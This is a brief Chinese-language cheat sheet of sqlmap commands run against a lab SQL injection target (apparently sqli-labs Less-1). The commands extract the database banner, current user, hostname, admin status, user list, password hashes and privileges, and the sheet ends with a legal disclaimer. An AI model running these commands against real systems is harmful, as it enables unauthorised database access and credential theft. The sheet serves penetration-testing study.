一、sqlmap检索DBMS Banner
–banner或者-b
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b
二、sqlmap检索DBMS当前用户
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-user
三、sqlmap检索DBMS当前数据库
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-db
四、sqlmap检索DBMS当前主机名
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --hostname
五、sqlmap探测当前用户是否是数据库管理员
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --is-dba
六、枚举DBMS用户
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --user
七、枚举DBMS用户密码
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --password
八、枚举DBMS权限
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --role
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --privileges
禁止非法,后果自负
